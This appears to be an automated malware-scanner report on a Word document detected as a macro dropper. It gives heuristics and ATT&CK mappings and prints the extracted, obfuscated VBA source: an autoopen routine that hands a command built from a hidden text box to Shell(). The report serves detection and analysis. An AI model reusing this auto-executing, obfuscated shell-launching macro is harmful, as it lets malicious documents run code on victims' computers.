MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including an autoopen macro, which is a common technique for initial execution in malicious documents. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, and 'SC_STR_CMD' confirms a suspicious cmd.exe invocation. This suggests the macro is designed to execute a command-line utility, likely to download and run a second-stage payload, consistent with a dropper malware.
Heuristics 9
-
ClamAV: Doc.Dropper.Sload-6782040-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Sload-6782040-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(ojzFsSicpE, jwNVZllmPbP), rSpFiYo) Set zJRfwpGovPDPBipkBuOaQB = JNzwaQwBWstXJBn -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() TGZDNSvsS -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8026 bytes |
SHA-256: 8ae7614a70e4b56965d34658cd9e2917ed5269e8757cd938228ba7f064653d32 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
220 of 258 identifiers look randomly generated (e.g. 'inKCqCNXzDYlzQunlDcFMoNj') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JSutzbIDItO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
TGZDNSvsS
End Sub
Attribute VB_Name = "TGrdRnCLv"
Function TGZDNSvsS()
On Error Resume Next
Set XrzwqNfbbDchPciPZEH = CJQZWMwwhjVAwuYfMSjIqMp
HqDrsmlnZGZObYbdOhtvhb = Sqr(UEzDHXwCqTdSjJGFvuibpV)
DoqDtJSuFfEjnsji = 102704773 * Oct(EiuwFvUIbwAzAwztwPQ) * 133704653 * tXYYmcZTMMQSAkm - (104232035 + CLng(ivilhUuFiHktwTO) * 311342474 * CBool(137072830))
LVaTTuoPlkjzMMiq = ChrW(UlULDiSHUpZPsBXjYbufO)
Set HNfYTDXDcihSobQ = ImftUALcGnWOianE
navoOSjoOQQqbfsdQQffQl = Sqr(CCSfjJVCucdBBUX)
UzFGkvmfHilRJIZYCTslwmz = 203881114 * Oct(NWNzirItXLfKfWHQnXBXDtl) * 22836507 * zhcmwhzaMWZYhdn - (193100175 + CLng(lztNWwlUIPwHpUkKsfJ) * 211944424 * CBool(46654792))
djjSzhsFuOufHnKrclq = ChrW(nSBTXCoNpwizRLTMi)
Set vUjCZdFNLzWYwHFaMGcwn = SjrOqYSipjrPqkEzMSp
nKLIHRvtbiKZwTC = Sqr(KLnjvcJnjhQUWMtJJjoHXjGZ)
YGGYRSXiGoBfILKAYbaB = 182501688 * Oct(OoBQQiuabEODWWCOPO) * 299221962 * QYsdAUiHzHjXBBrSXBCso - (208896351 + CLng(zRFoozJMLHqHqwXP) * 315498890 * CBool(341841230))
bTXqCVikqNMBwkLvLvfqJp = ChrW(VQKtBWzmGsBEsZbCTJNSzwG)
Set jtkjhNuYslYUthkp = AjXRNptYFnFAwWtIuU
HKJArLriKRTRjj = Sqr(abzwTEqHcZoYwOfLwMiiK)
jjFWGiHlWYQMwRJwBwQCjaC = 257234745 * Oct(TfFUEwBZivSqzzHAqDQHkSN) * 12134179 * LjRHKFiSbnDBQR - (171603308 + CLng(nNVrHEBICpXlfKARE) * 133780974 * CBool(296627109))
kRYqnXVJEwZlqswFr = ChrW(sHiIFUhsnQnlzwYL)
Set LEVnjDJlWIziUlCnYQYmdNm = NnXKzMzjBiHwHZwKR
pwJuWSzRXjcQOzSCZsfz = Sqr(KKQcqdFfzSOUwYnJSREKio)
HkPKiFAGiStiotRjp = 299295414 * Oct(YNNvQYitGaboDWtIraSba) * 335126733 * jCEtzPAlPRwPDtoz - (248301197 + CLng(LtfDdpIukaFWSL) * 168949993 * CBool(13204557))
tLffdGpLXHGpPCbhaOFj = ChrW(YOlEiajszkqBPvnGVhnp)
Set zKwmZzQwQcCofjD = BOOKiHBRcAipmX
QzOpbqwXSpQZOKzP = Sqr(DaWuTDarJhJYVaJsRm)
RtcKCqwURimGdkHmMBRzvn = 328035471 * Oct(JpzzPGjzXLwcbPTDW) * 232616504 * JXajoNozrApsdvK - (6741087 + CLng(rzELCoiRmiKwhNaM) * 202681903 * CBool(267910673))
jJKjbJoziSVjQOGMXizGirO = ChrW(idAKmPjwHQREjP)
Set nOOpVPYrDPRZdYco = HdqHOupKNrjUKU
JGJpzwfonwpfcJYHPoNMNSF = Sqr(UYiIYsWtvYQWOmrEcoC)
YONBpjRfzIfqAkVY = 117150466 * Oct(QvZwkEtBsczIjYPuAF) * 72880178 * SoaqvmsZWiRSmFXHmbiJ - (50588119 + CLng(roioYGbGjPNoEcUiAzLTiN) * 74875458 * CBool(203083354))
iBIIZbCVizmIHOmwQv = ChrW(EwBvmDahznJddD)
Set MuiHfYiLmQVPpOlPBiKCRL = pbHPQitIjfwNKwKLPjU
jnnNoVXUBFZYBUsjYISctImj = Sqr(AbRrTvSwOrCntauKYGdGZMq)
imGRrDaBDVouGdi = 65450382 * Oct(bmdqsiiXRUBIdSo) * 242339545 * MjpAFLQBjYmAEuXT - (341673972 + CLng(ZNOlHYuaiYsaDzJuRBUGWaMp) * 57114362 * CBool(44955289))
XNZdodUOXzbZQGfdrIIUmqJd = ChrW(ztazAYdAcXMJvDzjlm)
Const jwNVZllmPbP = 0
Set kjQokPPAHILatjr = ZTJIBOoKLZwCRYBwKEDi
fAVaGhKnCosHwjWQn = Sqr(VrGcKSMijHOQocM)
uSohvhiWJlEvTrfj = 149505369 * Oct(inKCqCNXzDYlzQunlDcFMoNj) * 128431753 * ORPrbhtruZAsclTXjaz - (152827952 + CLng(nAfGbERktZaiRowHFbrsI) * 146148176 * CBool(134825800))
taqloFmlwoaQjlAccHAAZJ = ChrW(wXQdwGfcRjsNANfw)
Set MfdlTRYMwJVREvhwczSqIGcM = LWfSQmBjNYLuNufmzObBQ
wLNutzlnFDREIvsuhWTi = Sqr(WVBOEmDIsAKQhZUFVtDzZTH)
JmkuFjEhimZpLjoLiiMC = 40746549 * Oct(bWXpMdPlRDOYERBIDLvdiu) * 337427465 * tpEsOvGEXVLOXPUbRzVW - (180885598 + CLng(bWJZaBGdFjWsvWYXWVzJAi) * 43860911 * CBool(256831703))
nqULkZcDGOiioUFzuQfri = ChrW(wDuazYSmsQWomKmRUG)
Set ihwYSuKTduRzwt = vHkDLaUDPspwhzjs
pSaSvjPbIpbvCj = Sqr(YaRmuYEdJdjfczdVzCQKi)
sAbVbCktHMMGYGjuzc = 245735345 * Oct(QoLAmdfTdtmWFFiRKZwBsP) * 144456878 * TWZXpCEoYpCEoajzXR - (104993627 + CLng(apBTXOjYfjvBSphPE) * 49815039 * CBool(196828156))
ozzPCidkqzdbzHwdVGz = ChrW(SjJotBlztTtQnoZcslQ)
Set BKfpDUmYchSzAiXCzQ = CDKScXiowdkSOdobltHnKD
cKfjHBCldRiOSqsCSYjqus = Sqr(DULDmJpcizOhHzoXn)
rGBkOWksqpOdNukwbOvzPco = 269564063 * Oct(PEIlFiBtwDmNTF) * 270680957 * tTANAlUzKVZbpiORM - (235369212 + CLng(RbHkLMkRqziHJGfVJobzikLa) * 237945035 * CBool(31813083))
ERoUBjHXrlioAQUdzbN = ChrW(UJIFdljUjQhAGmfzC)
Set UwPKXtzvqGtZIcuXoTh = niPjHuwuOpvstCX
hiKuvGoLOYNzubiLm = Sqr(nlijDduFhAKBjGEdpJJmM)
uDVjjzzmHkFIOmiBbhAq = 161849167 * Oct(BNsHuRlYCAYGriLTwuFuta) * 313749542 * rRvoibmWIHCHrYEiBii - (36683955 + CLng(IvDqHlFlduaRUPcVzqaNB) * 329055589 * CBool(236457250))
DcXpWtKsqnjWrzaqhli = ChrW(cqWJbMEsHsiKLbni)
Set MEzcRUVEQhzdIj = RwtIslMzBVtQiwrMMHO
NYnasKoBizMXFcPcbQr = Sqr(AFwHXEqHZVmWtJOtL)
PhzLVBJVKChOlwPwZ = 55656794 * Oct(jCoUhcIMpiwNWQIBJVp) * 234481140 * zCunaKkqGwkGTfQbNPiMpTrO - (267882106 + CLng(wcuGbkYdiAtjHRYV) * 234932558 * CBool(224888259))
HDksawFGWHiLjzPL = ChrW(vzUAhqzPhjHRoTj)
ojzFsSicpE = JSutzbIDItO.TextBox1 + kjibjj + zPjfQTW + GOOJoS + FYLQKvdR + duOpcViF + pUGOtY + wQmsb + MSrobZ + BEvQzdbI + MlnhXpkW
Set AjLNHnLaGkszPLXikVbIp = HAMTZrmNwfmQYbkikl
crnzwJWZpvbOtvjZLAnNUns = Sqr(MMwnwwFkqPNbUAOJCRzRW)
sUrCYizXZpzCmlLid = 281349286 * Oct(rYiiFEKmdKCpaOuUdwtabn) * 120799403 * XcROcwUoGcftOmlzNrTMXz - (159385981 + CLng(rRhmjQOEGoKcnwJfqNjwjB) * 36330970 * CBool(284627418))
vMkTFSYEiWLQiFqO = ChrW(nabJKQhoWJQZEqLqcnE)
Set vnccwDHiXNKqAqR = cPSkZWZVcIIbpWGQYS
HJzzFWBwUionclWLbzLjY = Sqr(GAovfoBGuRiHKNfP)
NXYErnUfqTKfQNmJ = 298515673 * Oct(wKJqNzOkWFUaIj) * 78520773 * zIAJPMUQpVqbdEwzRKiFCW - (72032472 + CLng(qGQOKPKdTiPiJknjqtA) * 289096166 * CBool(42637546))
GSJXJwwGjazZSIwFFaKNIz = ChrW(SnjXwOJVTUDAzFnFMfMuoj)
Set bjbaCIaFQMdtiuwnCrHARbaZ = jFTFVHlpiETzfOdJl
sMqSwkmLKPodAGBKTD = Sqr(zuFrEEpioXcdqjF)
MZRIiTKwVAAEMzVvZClbn = 137093643 * Oct(OGGwnhlwwuYpkCuYjkIVDD) * 248564133 * qChDnviurnCCcVXPk - (13269185 + CLng(JoIktfiFqiwjKU) * 263401386 * CBool(48695807))
AhLBPizwzsvLMtlBzcdiR = ChrW(YIqnPsEshoNmOCqCtJKnum)
Set iunOOcTIORHpnnKsas = zLKpAwsOMNGuqX
rrEZMvEvjKplmtwVbZPIIXE = Sqr(QWNGvHXQRvvTnAfGsPbfKM)
VOsiUbPjTmSJqiw = 2583226 * Oct(nZUrzihbuIPtwZbDQsr) * 21017684 * CoBLcjVqpYtOzrlsOXjK - (21420007 + CLng(TzpWMqGZpGzwkkSfVzM) * 239950761 * CBool(30636303))
WizhpKCUHsZcVBVFTikPi = ChrW(RAHBZiCmwSVkdLZfBvXVzE)
Set NKDCdLSAiswkpFK = mvAVaBcvjNcnaAdNCjPfnKKB
zIQZBTLIizwzHiM = Sqr(IWPiiZdOlhFpiJbkzMatL)
iuRirDfPuFCzfouTiZ = 202035208 * Oct(nTOViZVNwvDTWm) * 285781126 * RzhZjVmzmhinqfhBOJ - (223458296 + CLng(jvASiRRzCjbszZCi) * 290455587 * CBool(31386028))
RjOizviXSOCEMEjpV = ChrW(PrSEnzDFlpRdDIJqQiRMDXzt)
Set UUjCfBWolWEiMjCfFfNh = OFJsirOfkOsMBbkPiYNWVs
qCOornJYPDrGOaKBKHJBIMVK = Sqr(SQWHzLSVGSpPDXr)
pdJKVVpYWDOMrqihEjY = 155138719 * Oct(QPsYkHHUmHjRaSjMAmwawk) * 319504614 * GiQoIKWwUnYNQmkOiDkwfvRY - (309628877 + CLng(EtcwpjTwRGrSMbklzn) * 299499871 * CBool(142537153))
NCisuzARLMstoGdWXzsuUUiX = ChrW(rJMtzdiZYqruEujSf)
wYYUGPZpA = Array(btYLcDq, XNjNUPQm, TDMbpOk, Interaction _
_
_
_
_
_
_
_
.Shell(ojzFsSicpE, jwNVZllmPbP), rSpFiYo)
Set zJRfwpGovPDPBipkBuOaQB = JNzwaQwBWstXJBn
CFiBSRKmEUziwDbZzFISwqfY = Sqr(NjWHLfjOwMViAmsCNuGQPETQ)
ZEtUzLZJEEkoitpQUz = 285626741 * Oct(qwSPPjwZHhJNFnl) * 179023009 * tzBvYvhHOiBRAvGbKdcldE - (104414497 + CLng(zCWvXiqHNaawqLSBl) * 51928189 * CBool(11509922))
uIHmClvKIpMojl = ChrW(WYmkfstDaUIlwKbAVDPUrvks)
Set RwlpfSjXAunJVoFXc = GaUkATMlinrENzTMWvODjcvo
ztatKvaEKNLthwRcujvjw = Sqr(pqJRKJZPdijDAZmsYsQz)
jISpwwamsAIkSE = 236021255 * Oct(slRfvjjNizsqBLCPwiFiq) * 183585581 * NwdldYShVCIfGzUH - (342313868 + CLng(FLzDkkjzsoowBtQYEjR) * 333144210 * CBool(19704583))
LPXntjwQcXFGlQOJOtEfjd = ChrW(WBPOiunpBYQzjjwqABbMQsu)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.